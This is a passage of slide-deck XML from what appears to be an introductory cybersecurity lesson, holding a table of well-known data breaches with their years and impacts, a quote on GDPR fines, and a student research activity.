            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>“If the Uber breach happened in 2018…they would be subject to a fine of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>€20 million</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>4% of global revenue.”</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;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4" name="Google Shape;1084;p58"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="375675" y="1294075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{584E4C29-16A3-4B96-AD44-0125373979AF}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2581225"/>
                <a:gridCol w="1079050"/>
                <a:gridCol w="4756425"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Organization</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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Year</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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</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381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Yahoo</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2013/14</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CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>Billion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Users Compromised -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>$350 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Valuation</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>eBay</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2014</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145 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> User Compromised</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Equifax</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2017</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143 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Users’ PII Exposed  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>209,000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> CC Numbers Leaked</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Heartland Payment Systems</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2008</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134 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> CC Numbers Leaked</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Sony</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2011</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77 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Accounts COmpromised </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>$171 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> in Business Loans</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>RSA Security</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2011</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40 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Employee Records Stolen</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Uber</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a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>2016</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57 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> User’s PII Leaked </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto Medium"/>
                          <a:ea typeface="Roboto Medium"/>
                          <a:cs typeface="Roboto Medium"/>
                          <a:sym typeface="Roboto Medium"/>
                        </a:rPr>
                        <a:t>Billions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Lost in Valuation. </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5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090" name="Google Shape;1090;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1" name="Google Shape;1091;p5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Exposure to the Web</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research a few of the previously mentioned breaches and answer corresponding questions.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Instructions sent via Slack. </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7" name="Google Shape;1097;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607800" y="3425000"/>
            <a:ext cx="3953700" cy="5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Exposure on the Web</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6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Structure of the Internet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103" name="Google Shape;1103;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